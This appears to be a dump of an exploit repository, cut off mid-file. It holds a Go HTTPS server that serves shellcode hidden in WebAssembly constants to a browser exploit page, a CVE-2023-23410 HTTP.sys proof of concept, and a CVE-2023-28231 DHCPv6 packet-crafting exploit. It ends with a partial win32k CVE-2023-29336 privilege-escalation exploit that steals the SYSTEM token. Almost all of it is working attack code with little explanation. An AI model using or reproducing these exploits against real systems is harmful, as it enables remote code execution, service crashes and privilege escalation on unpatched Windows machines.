    "content": "package main\n\nimport (\n\t\"errors\"\n\t\"flag\"\n\t\"fmt\"\n\t\"github.com/bytecodealliance/wasmtime-go/v8\"\n\t\"io/ioutil\"\n\t\"log\"\n\t\"math\"\n\t\"net/http\"\n\t\"os\"\n\t\"path\"\n\t\"path/filepath\"\n\t\"regexp\"\n\t\"strconv\"\n\t\"strings\"\n)\n\nvar globalFloat float64 = -1\n\nvar wasm_code = `\n(module\n  (func $f (export \"f\") (param i64)\n  (call $f (i64.const 0x12EB9060B0C03148)) ;; 48 31 C0 B0 60 90 EB 12    12EB9060B0C03148\n  (call $f (i64.const 0x0BEB9090008B4865)) ;; 65 48 8B 00 90 90 EB 0B    0BEB9090008B4865\n  (call $f (i64.const 0x0BEB909018408B48)) ;; 48 8B 40 18 90 90 EB 0B    0BEB909018408B48\n  (call $f (i64.const 0x0BEB909030408B48)) ;; 48 8B 40 30 90 90 EB 0B    0BEB909030408B48\n  (call $f (i64.const 0x0BEBc08b48C08548)) ;; 48 85 C0 48 8b c0 EB 0B    0BEBc08b48C08548\n  (call $f (i64.const 0x0BEB000002D1840F)) ;; 0F 84 D1 02 00 00 EB 0B    0BEB000002D1840F\n  (call $f (i64.const 0x0BEB9000320033BA)) ;; BA 33 00 32 00 90 EB 0B    0BEB9000320033BA\n  (call $f (i64.const 0x0BEB909020E2C148)) ;; 48 C1 E2 20 90 90 EB 0B    0BEB909020E2C148\n  (call $f (i64.const 0x0BEB90004C0045B9)) ;; B9 45 00 4C 00 90 EB 0B    0BEB90004C0045B9\n  (call $f (i64.const 0x0BEBdb8b48CA0148)) ;; 48 01 CA 48 8b db EB 0B    0BEBdb8b48CA0148\n  (call $f (i64.const 0x0BEB004E0052B941)) ;; 41 B9 52 00 4E 00 EB 0B    0BEB004E0052B941\n  (call $f (i64.const 0x0BEB909020E1C149)) ;; 49 C1 E1 20 90 90 EB 0B    0BEB909020E1C149\n  (call $f (i64.const 0x0BEB900045004BB9)) ;; B9 4B 00 45 00 90 EB 0B    0BEB900045004BB9\n  (call $f (i64.const 0x0BEBc98b48C90149)) ;; 49 01 C9 48 8b c9 EB 0B    0BEBc98b48C90149\n  (call $f (i64.const 0x0BEB004C004CB841)) ;; 41 B8 4C 00 4C 00 EB 0B    0BEB004C004CB841\n  (call $f (i64.const 0x0BEB909020E0C149)) ;; 49 C1 E0 20 90 90 EB 0B    0BEB909020E0C149\n  (call $f (i64.const 0x0BEB900044002EB9)) ;; B9 2E 00 44 00 90 EB 0B    0BEB900044002EB9\n  (call $f (i64.const 0x0BEBf68b48C80149)) ;; 49 01 C8 48 8b f6 EB 0B    0BEBf68b48C80149\n  (call $f (i64.const 0x0BEB909040488B48)) ;; 48 8B 48 40 90 90 EB 0B    0BEB909040488B48\n  (call $f (i64.const 0x0BEB904774C98548)) ;; 48 85 C9 74 47 90 EB 0B    0BEB904774C98548\n  (call $f (i64.const 0x0BEB90347509394C)) ;; 4C 39 09 75 34 90 EB 0B    0BEB90347509394C\n  (call $f (i64.const 0x0BEB207508513948)) ;; 48 39 51 08 75 20 EB 0B    0BEB207508513948\n  (call $f (i64.const 0x0BEB22741041394C)) ;; 4C 39 41 10 74 22 EB 0B    0BEB22741041394C\n  (call $f (i64.const 0x0BEBC08548008B48)) ;; 48 8B 00 48 85 C0 EB 0B    0BEBC08548008B48\n  (call $f (i64.const 0x0BEB10488B488C75)) ;; 75 8C 48 8B 48 10 EB 0B    0BEB10488B488C75\n  (call $f (i64.const 0x0BEB90903C416348)) ;; 48 63 41 3C 90 90 EB 0B    0BEB90903C416348\n  (call $f (i64.const 0x0BEBC80148C98949)) ;; 49 89 C9 48 01 C8 EB 0B    0BEBC80148C98949\n  (call $f (i64.const 0x0BEB000000880548)) ;; 48 05 88 00 00 00 EB 0B    0BEB000000880548\n  (call $f (i64.const 0x0BEB9090C031108B)) ;; 8B 10 31 C0 90 90 EB 0B    0BEB9090C031108B\n  (call $f (i64.const 0x0BEBff8b48CA0148)) ;; 48 01 CA 48 8b ff EB 0B    0BEBff8b48CA0148\n  (call $f (i64.const 0x0BEB909018528B44)) ;; 44 8B 52 18 90 90 EB 0B    0BEB909018528B44\n  (call $f (i64.const 0x0BEB909020428B44)) ;; 44 8B 42 20 90 90 EB 0B    0BEB909020428B44\n  (call $f (i64.const 0x0BEB9090245A8B44)) ;; 44 8B 5A 24 90 90 EB 0B    0BEB9090245A8B44\n  (call $f (i64.const 0x0BEB1c528bC80149)) ;; 49 01 C8 8b 52 1c EB 0B    0BEB1c528bC80149\n  (call $f (i64.const 0x0BEBCA0148CB0149)) ;; 49 01 CB 48 01 CA EB 0B    0BEBCA0148CB0149\n  (call $f (i64.const 0x0BEBc98b4dD28545)) ;; 45 85 D2 4d 8b c9 EB 0B    0BEBc98b4dD28545\n  (call $f (i64.const 0x0BEB00000092840F)) ;; 0F 84 92 00 00 00 EB 0B    0BEB00000092840F\n  (call $f (i64.const 0x0BEB90506C6175BB)) ;; BB 75 61 6C 50 90 EB 0B    0BEB90506C6175BB\n  (call $f (i64.const 0x0BEB909020E3C148)) ;; 48 C1 E3 20 90 90 EB 0B    0BEB909020E3C148\n  (call $f (i64.const 0x0BEB9074726956BE)) ;; BE 56 69 72 74 90 EB 0B    0BEB9074726956BE\n  (call $f (i64.const 0x0BEB088B41F30148)) ;; 48 01 F3 41 8B 08 EB 0B    0BEB088B41F30148\n  (call $f (i64.const 0x0BEB4674091C394A)) ;; 4A 39 1C 09 74 46 EB 0B    0BEB4674091C394A\n  (call $f (i64.const 0x0BEB04C08349C0FF)) ;; FF C0 49 83 C0 04 EB 0B    0BEB04C08349C0FF\n  (call $f (i64.const 0x0BEB90C572D03944)) ;; 44 39 D0 72 C5 90 EB 0B    0BEB90C572D03944\n  (call $f (i64.const 0x0BEBd28b4dC3C031)) ;; 31 C0 C3 4d 8b d2 EB 0B    0BEBd28b4dC3C031\n  (call $f (i64.const 0x0BEB904304B70F41)) ;; 41 0F B7 04 43 90 EB 0B    0BEB904304B70F41\n  (call $f (i64.const 0x0BEB9008245C8B48)) ;; 48 8B 5C 24 08 90 EB 0B    0BEB9008245C8B48\n  (call $f (i64.const 0x0BEBC8014C82048B)) ;; 8B 04 82 4C 01 C8 EB 0B    0BEBC8014C82048B\n\n  (call $f (i64.const 0x0BEB909090C68948)) ;; 48 89 C6 90 90 90 EB 0B    0BEB909090C68948\n  (call $f (i64.const 0x0BEB9000002000BA)) ;; BA 00 20 00 00 90 EB 0B    0BEB9000002000BA\n  (call $f (i64.const 0x0BEB00000040B841)) ;; 41 B8 40 00 00 00 EB 0B    0BEB00000040B841\n  (call $f (i64.const 0x0BEB90AABBCCDDB8)) ;; B8 DD CC BB AA 90 EB 0B    0BEB90AABBCCDDB8\n  (call $f (i64.const 0x0BEB909050F0014C)) ;; 4C 01 F0 50 50 90 EB 0B    0BEB909050F0014C\n  (call $f (i64.const 0x0BEB909090C18948)) ;; 48 89 C1 90 90 90 EB 0B    0BEB909090C18948\n  (call $f (i64.const 0x0BEB000019000548)) ;; 48 05 00 19 00 00 EB 0B    0BEB000019000548\n  (call $f (i64.const 0x0BEB90E6FFC18949)) ;; 49 89 C1 FF E6 90 EB 0B    0BEB90E6FFC18949\n)) \n`\n\nfunc faviconHandler(w http.ResponseWriter, r *http.Request) {\n\thttp.ServeFile(w, r, \"favicon.ico\")\n}\n\nfunc check(e error) {\n\tif e != nil {\n\t\tpanic(e)\n\t}\n}\nfunc isValidAddress(str string) bool {\n\tmatch, _ := regexp.MatchString(\"^[0-9a-fA-F]{1,8}$\", str)\n\treturn match\n}\n\nfunc processShellcodeAddr(str string, code string) (string, error) {\n\tif !isValidAddress(str) {\n\t\tfmt.Println(\"ShellcodeAddr地址无效\")\n\t\treturn \"\", errors.New(\"ShellcodeAddr地址无效\")\n\t}\n\tcode = strings.Replace(code, \"0x0BEB90AABBCCDDB8\", \"0x0BEB90\"+str+\"B8\", 1)\n\treturn code, nil\n}\nfunc fileServerHandler(w http.ResponseWriter, r *http.Request) {\n\tfmt.Println(r.URL.Path)\n\tp := \".\" + r.URL.Path\n\textName := path.Ext(r.URL.Path)\n\t// 获取路径的最后一部分\n\tbase := path.Base(r.URL.Path)\n\t// 检查它是否全部由0-9或a-f组成\n\tmatch, _ := regexp.MatchString(\"^[0-9a-f]+$\", base)\n\tif match {\n\t\tfmt.Println(\"Matched string:\", base)\n\t\t// 解析十六进制字符串为整数\n\t\ti, err := strconv.ParseInt(base, 16, 64)\n\t\tif err != nil {\n\t\t\tlog.Println(\"Error parsing hex string:\", err)\n\t\t\thttp.ServeFile(w, r, p)\n\t\t\treturn\n\t\t}\n\t\t// 获得i的高4个字节并减去0x10\n\t\thigh4Bytes := int64(uint64(i)>>32) - 0x10\n\n\t\t// 确保减法操作不会使值变为负数\n\t\tif high4Bytes < 0 {\n\t\t\thigh4Bytes = 0\n\t\t}\n\n\t\t// 用新值替换i的高4个字节\n\t\ti = (high4Bytes << 32) | (i & 0xFFFFFFFF)\n\t\t// 解析整数为浮点数\n\t\tglobalFloat = math.Float64frombits(uint64(i))\n\t\t// 打印浮点数\n\t\tfmt.Println(\"Float: \", globalFloat)\n\t\t// Send an empty response\n\t\tw.WriteHeader(http.StatusOK)\n\t\treturn\n\t}\n\tif base == \"exp.html\" {\n\t\tif globalFloat == -1 {\n\t\t\tfmt.Fprint(w, `\n\t\t\t<!DOCTYPE html>\n\t\t\t<html>\n\t\t\t<head>\n\t\t\t\t<title>Refresh Page</title>\n\t\t\t</head>\n\t\t\t<body>\n\t\t\t\t<script>setTimeout(function(){ location.reload(); }, 1000);</script>\n\t\t\t\t<p>Loading...</p>\n\t\t\t</body>\n\t\t\t</html>\n\t\t\t`)\n\t\t\treturn\n\t\t}\n\t\tcontent, err := ioutil.ReadFile(p)\n\t\tif err != nil {\n\t\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t\tnewContent := strings.Replace(string(content), \"xxx\", fmt.Sprint(globalFloat), -1)\n\t\tfmt.Println(\"New content: \", newContent)\n\t\tfmt.Fprint(w, newContent)\n\t\tglobalFloat = -1\n\t\treturn\n\t}\n\t// fmt.Println(extName)\n\tif extName == \".wasm\" {\n\t\t// 去掉扩展名\n\t\tnameWithoutExt := strings.TrimSuffix(r.URL.Path, filepath.Ext(r.URL.Path))\n\t\t// 去掉前面的\"/\"\n\t\tbaseName := filepath.Base(nameWithoutExt)\n\t\tfmt.Printf(baseName)\n\t\twasmCodeOk, err := processShellcodeAddr(baseName, wasm_code)\n\t\tif err != nil {\n\t\t\tfmt.Println(\"发生错误：\", err)\n\t\t\tpanic(\"处理ShellcodeAddr发生错误\")\n\t\t}\n\t\tfmt.Println(wasmCodeOk)\n\t\twasm, err := wasmtime.Wat2Wasm(wasmCodeOk)\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"error converting wat to wasm: %v\\n\", err)\n\t\t\tos.Exit(1)\n\t\t}\n\t\tfmt.Printf(\"编译结束\")\n\n\t\tw.Header().Set(\"Content-Type\", \"application/wasm\")\n\t\t_, err = w.Write([]byte(wasm))\n\t\tcheck(err)\n\t\tw.(http.Flusher).Flush()\n\t\tfmt.Printf(\"flushOK\")\n\t\treturn\n\t}\n\thttp.ServeFile(w, r, p)\n}\nfunc main() {\n\tport := flag.String(\"p\", \"443\", \"port to serve on\")\n\tdirectory := flag.String(\"d\", \".\", \"the directory of static file to host\")\n\tflag.Parse()\n\tfmt.Printf(\"path %s\\n\", *directory)\n\thttp.HandleFunc(\"/favicon.ico\", faviconHandler)\n\thttp.HandleFunc(\"/\", fileServerHandler)\n\tlog.Printf(\"Begin Serving %s on HTTP port: %s\\n\", *directory, *port)\n\tlog.Fatal(http.ListenAndServeTLS(\":443\", \"server.pem\", \"key.pem\", nil))\n}\n"
  },
  {
    "path": "CVE-2023-23410/CVE-2023-23410_poc.c",
    "content": "#define SECURITY_WIN32\r\n#include <http.h>\r\n#include <sspi.h>\r\n#include <strsafe.h>\r\n#pragma warning(disable:4127)   // condition expression is constant\r\n\r\nint\r\n__cdecl\r\nwmain(\r\n    int argc,\r\n    __in_ecount(argc) wchar_t* argv[]\r\n)\r\n{\r\n    \r\n    int i;\r\n    HANDLE          hReqQueue = NULL;\r\n    HTTPAPI_VERSION HttpApiVersion = HTTPAPI_VERSION_2;\r\n    HTTP_SERVER_SESSION_ID ssID = HTTP_NULL_ID;\r\n   \r\n    HTTP_BINDING_INFO BindingProperty;\r\n    HTTP_TIMEOUT_LIMIT_INFO CGTimeout;\r\n    ULONG           retCode;\r\n    HTTP_URL_GROUP_ID urlGroupId = HTTP_NULL_ID;\r\n\r\n\r\n    //\r\n    // Initialize HTTP APIs.\r\n    //\r\n\r\n    retCode = HttpInitialize(\r\n        HttpApiVersion,\r\n        HTTP_INITIALIZE_SERVER,    // Flags\r\n        NULL                       // Reserved\r\n    );\r\n\r\n    if (retCode != NO_ERROR)\r\n    {\r\n        wprintf(L\"HttpInitialize failed with %lu \\n\", retCode);\r\n        return retCode;\r\n    }\r\n\r\n    //\r\n    // Create a server session handle\r\n    //\r\n\r\n    retCode = HttpCreateServerSession(HttpApiVersion,\r\n        &ssID,\r\n        0);\r\n\r\n\r\n    if (retCode != NO_ERROR)\r\n    {\r\n        wprintf(L\"HttpCreateServerSession failed with %lu \\n\", retCode);\r\n        return;\r\n    }\r\n    //\r\n    // Create UrlGroup handle\r\n    //\r\n\r\n    retCode = HttpCreateUrlGroup(ssID,\r\n        &urlGroupId,\r\n        0);\r\n\r\n\r\n    if (retCode != NO_ERROR)\r\n    {\r\n        wprintf(L\"HttpCreateUrlGroup failed with %lu \\n\", retCode);\r\n        return;\r\n    }\r\n\r\n    ULONGLONG data1[4] = { 0 };\r\n    ULONGLONG data3[0x21] = { 0 };\r\n    ULONGLONG data[0x1000] = { 0 };\r\n    BYTE data_temp1[0x1000] = { 0 };\r\n    DWORD return_len = 0;\r\n\r\n    WCHAR* str = HeapAlloc(GetProcessHeap(), 0, 0xfffffe0);\r\n    WCHAR str_test[0xfffe] = L\"192.168.205.155:8081\";\r\n    memcpy(str, str_test, 0x20);\r\n    \r\n    data1[0] = 0x01;\r\n    data1[1] = str;\r\n    data1[2] = 0xfffffe0-0xf0f0f0;\r\n    \r\n    for (int i = 0; i < 0x11; i++)\r\n    {\r\n        data3[i] = data1;\r\n    }\r\n    data[5] = 0x20;\r\n    data[3] = 0x0c;\r\n    data[2] = 0x11;\r\n    data[0] = 0x1;\r\n    data[1] = data3;\r\n\r\n    retCode = HttpSetUrlGroupProperty(urlGroupId, HttpServerChannelBindProperty,&data,0x20);\r\n\r\n    retCode = HttpQueryUrlGroupProperty(urlGroupId,HttpServerChannelBindProperty,&data_temp1,0x140, &return_len);\r\n\r\n\r\n}\r\n\r\n"
  },
  {
    "path": "CVE-2023-28231/CVE-2023-28231-DHCP-VUL-PoC.cpp",
    "content": "\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#include <iostream>\r\n\r\n#pragma comment(lib, \"Ws2_32.lib\")\r\n\r\nint main() {\r\n    char data[] =\r\n        \"\\x0c\\x03\\xa4\\xf2\\x00\\x08\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\\x01\"\r\n        \"\\x00\\x01\\x2b\\x07\\x5b\\xc1\\x00\\x0c\\x29\\xe8\\x6b\\x79\\x00\\x03\\x00\\x0c\"\r\n        \"\\x07\\x00\"\r\n\r\n\r\n\r\n\r\n        \"\\x00\\x09\\x00\\x86\\x0c\\x02\"//0x3a+0x26*2\r\n\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n        \"\\x00\\x09\\x00\\x60\\x0c\\x02\"//0x3a+0x26\r\n\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n        \"\\x00\\x09\\x00\\x3a\\x0c\\x01\"\r\n\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n        \"\\x00\\x09\\x00\\x14\\x01\\x07\\x00\\x00\"\r\n        \"\\x00\\x02\\x00\\x04\\x01\\x07\\x00\\x00\"\r\n        \"\\x00\\x01\\x00\\x04\\x01\\x07\\x00\\x00\"\r\n\r\n        ;\r\n\r\n    char par1[] =\r\n        \"\\x00\\x09\\x0a\\x9b\\x0c\\x01\"\r\n        \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n    char par2[] =\r\n        \"\\x00\\x09\\x00\\x14\\x01\\x07\\x00\\x00\"\r\n        \"\\x00\\x02\\x00\\x04\\x01\\x07\\x00\\x00\"\r\n        \"\\x00\\x01\\x00\\x04\\x01\\x07\\x00\\x00\"\r\n        ;\r\n\r\n\r\n\r\n    char data1[0x1000] =\r\n        \"\\x0c\\x20\\xa4\\xf2\\x00\\x08\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\\x01\"\r\n        \"\\x00\\x01\\x2b\\x07\\x5b\\xc1\\x00\\x0c\\x29\\xe8\\x6b\\x79\\x00\\x03\\x00\\x0c\"\r\n        \"\\x07\\x00\"\r\n\r\n        ;\r\n\r\n    int num = 0x1f;\r\n    int total_len = 0x14 + 0x26 * (num+1);\r\n    for (int i = 0; i <= num; i++)\r\n    {\r\n        memset(par1 + 5, num - i, 1);\r\n        short temp = htons(total_len - i * 0x26);\r\n\r\n        memcpy(par1 + 2, &temp, 2);\r\n        memcpy(data1 + 0x22 + 0x26 * i, par1, 0x26);\r\n        if (i == num)\r\n        {\r\n            memcpy(data1 + 0x22 + 0x26 * i + 0x26, par2, 0x18);\r\n        }\r\n\r\n    }\r\n    int sendlenth = 0x26 * (num+1) + 0x22 + 0x18;\r\n    // 初始化 Winsock\r\n    WSADATA wsaData;\r\n    int result = WSAStartup(MAKEWORD(2, 2), &wsaData);\r\n    if (result != 0) {\r\n        std::cerr << \"WSAStartup failed with error: \" << result << std::endl;\r\n        return 1;\r\n    }\r\n\r\n    // 创建套接字\r\n    SOCKET sock = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\r\n    if (sock == INVALID_SOCKET) {\r\n        std::cerr << \"Failed to create socket: \" << WSAGetLastError() << std::endl;\r\n        WSACleanup();\r\n        return 1;\r\n    }\r\n\r\n    // 设置套接字选项，允许发送广播\r\n    int optVal = 1;\r\n    if (setsockopt(sock, IPPROTO_IPV6, IPV6_MULTICAST_LOOP, (char*)&optVal, sizeof(optVal)) == SOCKET_ERROR) {\r\n        std::cerr << \"Failed to set socket option: \" << WSAGetLastError() << std::endl;\r\n        closesocket(sock);\r\n        WSACleanup();\r\n        return 1;\r\n    }\r\n\r\n    // 构建 DHCPv6 广播地址\r\n    sockaddr_in6 destAddr = { 0 };\r\n    destAddr.sin6_family = AF_INET6;\r\n    destAddr.sin6_port = htons(547); // DHCPv6 默认端口号为 547\r\n    InetPton(AF_INET6, L\"ff02::1:2\", &destAddr.sin6_addr); // DHCPv6 广播地址为 ff02::1:2\r\n\r\n    // 发送 DHCPv6 广播消息\r\n    int sendResult = 0;\r\n    for (int i = 0; i < 0x10; i++)\r\n    {\r\n        sendResult = sendto(sock, data1, sendlenth, 0, (sockaddr*)&destAddr, sizeof(destAddr));\r\n    }\r\n\r\n    int m = GetLastError();\r\n    if (sendResult == SOCKET_ERROR) {\r\n        std::cerr << \"Failed to send data: \" << WSAGetLastError() << std::endl;\r\n        closesocket(sock);\r\n        WSACleanup();\r\n        return 1;\r\n    }\r\n\r\n    std::cout << \"DHCPv6 Broadcast message sent!\" << std::endl;\r\n\r\n    // 清理资源\r\n    closesocket(sock);\r\n    WSACleanup();\r\n\r\n    return 0;\r\n}\r\n"
  },
  {
    "path": "CVE-2023-29336/poc.cpp",
    "content": "\n// writeup link:  https://www.numencyber.com/cve-2023-29336-win32k-analysis/\n\n#include <windows.h>\n//windows server 2016 Datacenter update patch in May\n#include <stdio.h>\n#include <tchar.h>\n\n#define IDM_MYMENU 101\n#define IDM_EXIT 102\n#define IDM_DISABLE 0xf120\n#define IDM_ENABLE 104\n#define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440\n#define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448\n#define EPROCESS_TOKEN_OFFSET 0x4b8\n\ntypedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT uIDEnableItem, UINT uEnable);\n\ntypedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2, unsigned __int64 a3, unsigned int a4);\ntypedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2);\ntypedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID, int nConsoleInformationLength);\n\n\nNtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL;\nNtUserEnableMenuItem g_NtUserEnableMenuItem = NULL;\nNtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL;\nfnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr;\nLRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam);\nint syytem();\ntypedef struct _SHELLCODE {\n    DWORD reserved;\n    DWORD pid;\n    DWORD off_THREADINFO_ppi;\n    DWORD off_EPROCESS_ActiveLink;\n    DWORD off_EPROCESS_Token;\n    BOOL  bExploited;\n    BYTE  pfnWindProc[];\n} SHELLCODE, * PSHELLCODE;\nstruct tagMENU\n{\n    ULONG64 field_0;\n    ULONG64 field_8;\n    ULONG64 field_10;\n    ULONG64 field_18;\n    ULONG64 field_20;\n    PVOID obj28;\n    DWORD field_30;\n    DWORD flag1;\n    DWORD flag2;\n    DWORD cxMenu;\n    DWORD cyMenu;\n    ULONG64 field_48;\n    PVOID rgItems;\n    ULONG64 field_58; // + 0x58\n    ULONG64 field_60;\n    ULONG64 field_68;\n    ULONG64 field_70;\n    ULONG64 field_78;\n    ULONG64 field_80;\n    ULONG64 field_88;\n    ULONG64 field_90;\n    PVOID ref; // + 0x98\n};\nstruct MyData\n{\n    BYTE name[0x96];\n};\ntagMENU* g_pFakeMenu = 0;\nstatic PSHELLCODE pvShellCode = NULL;\nHMENU hSystemMenu;\nHMENU hMenu;\nHMENU hSubMenu;\nHMENU hAddedSubMenu;\nHMENU hMenuB;\nPVOID MENU_add = 0;\nDWORD flag = 0;\nUINT iWindowCount = 0x100;\nHWND HWND_list[0x300];\nHWND HWND_list1[0x20];\nHMENU HMENUL_list[0x300];\nint Hwnd_num = 0;\nint Hwnd_num1 = 0;\nULONGLONG HWND_add = 0;\nULONGLONG GS_off = 0;\nWORD max = 0;\n\nstatic PULONGLONG     ptagWNDFake = NULL;\nstatic PULONGLONG     ptagWNDFake1 = NULL;\nstatic PULONGLONG     ptagWNDFake2 = NULL;\n\nstatic PULONGLONG     GS_hanlde = NULL;\n\nstatic PULONGLONG     HWND_class = NULL;\n\n\nstruct ThreadParams {\n    int threadId;\n    int numLoops;\n};\n\n\nstatic unsigned long long GetGsValue(unsigned long long gsValue)\n{\n    return gsValue;\n}\nPVOID\nGetMenuHandle(HMENU menu_D)\n{\n    int conut = 0;\n    PVOID HANDLE = 0;\n    PBYTE add = 0;\n    WORD temp = 0;\n    DWORD offset = 0xbd688;\n    HMODULE hModule = LoadLibraryA(\"USER32.DLL\");\n\n    PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, \"IsMenu\");\n    ULONGLONG par1 = 0;\n    DWORD par2 = 0;\n    memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08);\n    memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);\n\n    add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);\n\n    if (add)\n    {\n        HANDLE = *(PVOID*)add;\n    }\n    else\n    {\n        HANDLE = 0;\n    }\n    HANDLE= (PVOID*)((ULONGLONG)HANDLE - GS_off+0x20);\n    return *(PVOID*)HANDLE;\n\n}\n\nPVOID\nxxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde)\n{\n    int conut = 0;\n    PVOID HANDLE = 0;\n    PBYTE add = 0;\n    WORD temp = 0;\n    DWORD offset = 0xbd688;\n    HMODULE hModule = LoadLibraryA(\"USER32.DLL\");\n\n    PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, \"IsMenu\");\n    ULONGLONG par1 = 0;\n    DWORD par2 = 0;\n    memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08);\n    memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);\n\n    temp = (ULONGLONG)menu_D >> 16;\n    add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);\n    if (add)\n    {\n        HANDLE = *(PVOID*)add;\n    }\n    else\n    {\n        HANDLE = 0;\n    }\n    HANDLE = (PVOID*)((ULONGLONG)HANDLE - GS_off + 0x20);\n    return *(PVOID*)HANDLE;\n\n}\n\n\nstatic\nVOID\nxxReallocPopupMenu(VOID)\n{\n    for (INT i = 0; i < 0x8; i++)\n    {\n        WNDCLASSEXW Class = { 0 };\n        WCHAR       szTemp[0x100] = { 0 };\n        HWND        hwnd = NULL;\n        wsprintfW(szTemp, L\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d\", i);\n        Class.cbSize = sizeof(WNDCLASSEXA);\n        Class.lpfnWndProc = DefWindowProcW;\n        Class.cbWndExtra = 0;\n        Class.hInstance = GetModuleHandleA(NULL);\n        Class.lpszMenuName = NULL;\n        Class.lpszClassName = szTemp;\n        if (!RegisterClassExW(&Class))\n        {\n            continue;\n        }\n    }\n\n}\nVOID\ncreateclass(VOID)\n{\n    WCHAR   szTemp[0x100] = { 0 };\n    for (INT i = 9; i < 29; i++)\n    {\n        WNDCLASSEXW Class = { 0 };\n        \n        HWND        hwnd = NULL;\n        wsprintfW(szTemp, L\"A@A%d\", i);\n        Class.cbSize = sizeof(WNDCLASSEXA);\n        Class.lpfnWndProc = DefWindowProcW;\n        Class.cbWndExtra = 0x20;\n        Class.hInstance = GetModuleHandleA(NULL);\n        Class.lpszMenuName = NULL;\n        Class.lpszClassName = szTemp;\n        Class.cbClsExtra = 0x1a0;\n        if (!RegisterClassExW(&Class))\n        {\n            continue;\n        }\n    }\n\n    for (INT i = 9; i < 29; i++)\n    {\n        wsprintfW(szTemp, L\"A@A%d\", i);\n        HWND_list1[i]=CreateWindowEx(NULL, szTemp, NULL, WS_VISIBLE, 0, 0, 0, 0, NULL,NULL, NULL, NULL);\n        \n        \n    }\n    \n}\n\nULONG64 Read64(ULONG64 address)\n{\n    MENUBARINFO mbi = { 0 };\n    mbi.cbSize = sizeof(MENUBARINFO);\n\n    g_pFakeMenu->rgItems = PVOID(address - 0x48);\n    GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &mbi);\n\n    return (unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32);\n}\nvoid exploit()\n{\n    for (int i = 0; i < 0x20; i++)\n    {\n        \n        ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270, (LONG_PTR)g_pFakeMenu);\n        if (pmenu != 0)\n        {\n            Hwnd_num = i;\n            MENUBARINFO mbi = { 0 };\n            mbi.cbSize = sizeof(MENUBARINFO);\n\n\n\n        }\n    }\n\n\n    // Token stealing\n    ULONG64 p = Read64(HWND_add +0x250+ 0x10); // USER_THREADINFO \n    p = Read64(p);            //THREADINFO\n    p = Read64(p + 0x220);         // (PROCESSINFO)         \n\n    ULONG64 eprocess = p;\n    printf(\"Current EPROCESS = %llx\\n\", eprocess);\n    p = Read64(p + 0x2f0);\n\n    do {\n\n        p = Read64(p + 0x08);\n        ULONG64 pid = Read64(p - 0x08);\n        if (pid == 4) {\n\n            ULONG64 pSystemToken = Read64(p + 0x68);\n            printf(\"pSys/tem Token = %llx \\n\", pSystemToken);\n\n            HWND_class = (PULONGLONG)((PBYTE)0x303000);\n            HWND_class[8] = eprocess + 0x290;\n            HWND_class[12] = 0x100;\n            HWND_class[20] = 0x303010;\n\n            ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)HWND_class);\n            SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken);\n            ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)ret_add);\n\n            break;\n        }\n    } while (p != eprocess);\n    syytem();\n}\n\n\nvoid buildmem()\n{\n    \n    WORD max_handle = 0;\n    pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\n    if (pvShellCode == NULL)\n    {\n        return;\n    }\n    ZeroMemory(pvShellCode, 